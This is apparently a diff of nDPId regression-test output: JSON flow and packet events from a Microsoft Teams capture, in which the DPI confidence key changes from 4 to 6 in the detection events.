00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1697,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1587041684317,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041684317,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0FJpAAHUGEAYNaxILwKgBBgG77IU13hw0zZy4moAS\/\/\/HZQAAAgQFoAEDAwgBAQQC"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1698,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1587041684317,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041684317,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGWazAqAEGDWsSC+yFAbvNnLiaNd4cNVAQIADoJAAA"} 
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1699,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041684306,"flow_last_seen":1587041684317,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1587041684317,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"13.107.18.11","src_port":60549,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"substrate.office.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01688{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1722,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1587041684306,"flow_last_seen":1587041684362,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4607,"flow_avg_l4_payload_len":460,"midstream":0,"thread_ts_msec":1587041684362,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"13.107.18.11","src_port":60549,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"substrate.office.com","server_names":"outlook.office.com,attachment.outlook.office.net,attachment.outlook.officeppe.net,bookings.office.com,delve.office.com,edge.outlook.office365.com,edgesdf.outlook.com,img.delve.office.com,outlook.live.com,outlook-sdf.live.com,outlook-sdf.office.com,sdfedge-pilot.outlook.com,substrate.office.com,substrate-sdf.office.com,afd-k-acdc-direct.office.com,beta-sdf.yammer.com,teams-sdf.yammer.com,beta.yammer.com,teams.yammer.com,attachments.office.net,attachments-sdf.office.net,afd-k.office.com,afd-k-sdf.office.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"a66ea560599a2f5c89eec8c3a0d69cee","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert Cloud Services CA-1","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Outlook.office.com","alpn":"h2,http\/1.1","fingerprint":"AA:D3:F5:66:06:48:AA:F8:8E:9B:79:D6:7F:1D:53:EA:3F:97:03:A2"}} +00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1699,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041684306,"flow_last_seen":1587041684317,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1587041684317,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"13.107.18.11","src_port":60549,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"substrate.office.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+01688{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1722,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1587041684306,"flow_last_seen":1587041684362,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4607,"flow_avg_l4_payload_len":460,"midstream":0,"thread_ts_msec":1587041684362,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"13.107.18.11","src_port":60549,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"substrate.office.com","server_names":"outlook.office.com,attachment.outlook.office.net,attachment.outlook.officeppe.net,bookings.office.com,delve.office.com,edge.outlook.office365.com,edgesdf.outlook.com,img.delve.office.com,outlook.live.com,outlook-sdf.live.com,outlook-sdf.office.com,sdfedge-pilot.outlook.com,substrate.office.com,substrate-sdf.office.com,afd-k-acdc-direct.office.com,beta-sdf.yammer.com,teams-sdf.yammer.com,beta.yammer.com,teams.yammer.com,attachments.office.net,attachments-sdf.office.net,afd-k.office.com,afd-k-sdf.office.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"a66ea560599a2f5c89eec8c3a0d69cee","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert Cloud Services CA-1","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Outlook.office.com","alpn":"h2,http\/1.1","fingerprint":"AA:D3:F5:66:06:48:AA:F8:8E:9B:79:D6:7F:1D:53:EA:3F:97:03:A2"}} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":1753,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041684611} 
00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":1753,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041684501,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1775,"source":"teams.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685090,"flow_last_seen":1587041685090,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1587041685090,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":61245,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1775,"source":"teams.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1587041685090,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"thread_ts_msec":1587041685090,"pkt":"EBMx8Tl2KDc3AG3ICABFAABJHhYAAP8RGjbAqAEGwKgBAe89ADUANcKVVKoBAAABAAAAAAAABGV1YXoCdHIFdGVhbXMJbWljcm9zb2Z0A2NvbQAAAQAB"} -00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1775,"source":"teams.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685090,"flow_last_seen":1587041685090,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1587041685090,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":61245,"dst_port":53,"l4_proto":"udp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"euaz.tr.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1775,"source":"teams.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685090,"flow_last_seen":1587041685090,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1587041685090,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":61245,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"euaz.tr.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1776,"source":"teams.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685091,"flow_last_seen":1587041685091,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1587041685091,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":53678,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1776,"source":"teams.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1587041685091,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":1587041685091,"pkt":"EBMx8Tl2KDc3AG3ICABFAABZE40AAP8RJK\/AqAEGwKgBAdGuADUARafs9AEBAAABAAAAAAAAD3Ryb3V0ZXIyLWFzc2UtYQd0cm91dGVyBXRlYW1zCW1pY3Jvc29mdANjb20AABwAAQ=="} -00800{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1776,"source":"teams.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685091,"flow_last_seen":1587041685091,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1587041685091,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":53678,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"trouter2-asse-a.trouter.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00800{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1776,"source":"teams.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685091,"flow_last_seen":1587041685091,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1587041685091,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":53678,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": 
{"query":"trouter2-asse-a.trouter.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1777,"source":"teams.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685092,"flow_last_seen":1587041685092,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1587041685092,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65230,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1777,"source":"teams.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1587041685092,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":1587041685092,"pkt":"EBMx8Tl2KDc3AG3ICABFAABZD5kAAP8RKKPAqAEGwKgBAf7OADUARYKEB0oBAAABAAAAAAAAD3Ryb3V0ZXIyLWFzc2UtYQd0cm91dGVyBXRlYW1zCW1pY3Jvc29mdANjb20AAAEAAQ=="} -00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1777,"source":"teams.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685092,"flow_last_seen":1587041685092,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1587041685092,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65230,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": 
{"query":"trouter2-asse-a.trouter.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1777,"source":"teams.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685092,"flow_last_seen":1587041685092,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1587041685092,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65230,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"trouter2-asse-a.trouter.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1778,"source":"teams.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685093,"flow_last_seen":1587041685093,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1587041685093,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":50653,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1778,"source":"teams.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1587041685093,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1587041685093,"pkt":"EBMx8Tl2KDc3AG3ICABFAABRstMAAP8RhXDAqAEGwKgBAcXdADUAPUwYqlcBAAABAAAAAAAAA2FwaQtmbGlnaHRwcm94eQV0ZWFtcwltaWNyb3NvZnQDY29tAAABAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1778,"source":"teams.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685093,"flow_last_seen":1587041685093,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1587041685093,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":50653,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"api.flightproxy.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1778,"source":"teams.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685093,"flow_last_seen":1587041685093,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1587041685093,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":50653,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": 
{"query":"api.flightproxy.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1781,"source":"teams.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1587041685104,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":173,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":173,"pkt_l4_len":139,"thread_ts_msec":1587041685104,"pkt":"KDc3AG3IEBMx8Tl2CABFAACfqZ9AADkRFFfAqAEBwKgBBgA10a4AiwAA9AGBgAABAAIAAAAAD3Ryb3V0ZXIyLWFzc2UtYQd0cm91dGVyBXRlYW1zCW1pY3Jvc29mdANjb20AABwAAcAMAAUAAQAADYsAHg90cm91dGVyMi1hc3NlLWEIY2xvdWRhcHADbmV0AMBJABwAAQAAAAUAECoBARHxAHAAAAAAAG\/dVKE="} -00813{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1781,"source":"teams.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041685091,"flow_last_seen":1587041685104,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":131,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1587041685104,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":53678,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"trouter2-asse-a.trouter.teams.microsoft.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"42.1.1.17"}} 
+00813{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1781,"source":"teams.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041685091,"flow_last_seen":1587041685104,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":131,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1587041685104,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":53678,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"trouter2-asse-a.trouter.teams.microsoft.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"42.1.1.17"}} 00597{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1782,"source":"teams.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1587041685105,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":161,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":161,"pkt_l4_len":127,"thread_ts_msec":1587041685105,"pkt":"KDc3AG3IEBMx8Tl2CABFAACTMl9AADkRi6PAqAEBwKgBBgA1\/s4AfwAAB0qBgAABAAIAAAAAD3Ryb3V0ZXIyLWFzc2UtYQd0cm91dGVyBXRlYW1zCW1pY3Jvc29mdANjb20AAAEAAcAMAAUAAQAADNUAHg90cm91dGVyMi1hc3NlLWEIY2xvdWRhcHADbmV0AMBJAAEAAQAAAAgABDRyDy0="} -00814{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1782,"source":"teams.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041685092,"flow_last_seen":1587041685105,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1587041685105,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65230,"dst_port":53,"l4_proto":"udp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"trouter2-asse-a.trouter.teams.microsoft.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.15.45"}} +00814{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1782,"source":"teams.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041685092,"flow_last_seen":1587041685105,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1587041685105,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65230,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"trouter2-asse-a.trouter.teams.microsoft.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.15.45"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1783,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685106,"flow_last_seen":1587041685106,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041685106,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.15.45","src_port":60551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1783,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1587041685106,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041685106,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGNWvAqAEGNHIPLeyHAbsC\/Q6WAAAAALAC\/\/9IhwAAAgQFtAEDAwUBAQgKMIS4zgAAAAAEAgAA"} 00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1792,"source":"teams.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1587041685127,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1587041685127,"pkt":"KDc3AG3IEBMx8Tl2CABFAADKzTRAADkR8JbAqAEBwKgBBgA1xd0AtgAAqleBgAABAAMAAAAAA2FwaQtmbGlnaHRwcm94eQV0ZWFtcwltaWNyb3NvZnQDY29tAAABAAHADAAFAAEAAA4OACoDYXBpC2ZsaWdodHByb3h5BXRlYW1zDnRyYWZmaWNtYW5hZ2VyA25ldADAQQAFAAEAAAEsACcbYy1mbGlnaHRwcm94eS1ldW5vLTAxLXRlYW1zCGNsb3VkYXBwwGbAdwABAAEAAAAGAAQ0ck2I"} -00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1792,"source":"teams.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041685093,"flow_last_seen":1587041685127,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1587041685127,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":50653,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"api.flightproxy.teams.microsoft.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.77.136"}} 
+00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1792,"source":"teams.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041685093,"flow_last_seen":1587041685127,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1587041685127,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":50653,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"api.flightproxy.teams.microsoft.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.77.136"}} 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1797,"source":"teams.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1587041685136,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1587041685136,"pkt":"KDc3AG3IEBMx8Tl2CABFAADDZa9AADkRWCPAqAEBwKgBBgA17z0ArwAAVKqBgAABAAMAAAAABGV1YXoCdHIFdGVhbXMJbWljcm9zb2Z0A2NvbQAAAQABwAwABQABAAALoAAiBGV1YXoCdHIFdGVhbXMOdHJhZmZpY21hbmFnZXIDbmV0AMA5AAUAAQAAAAAAMBJiLXRyLXRlYW1zLWV1bm8tMDULbm9ydGhldXJvcGUIY2xvdWRhcHAFYXp1cmXAJMBnAAEAAQAAAAoABDRy+ns="} 
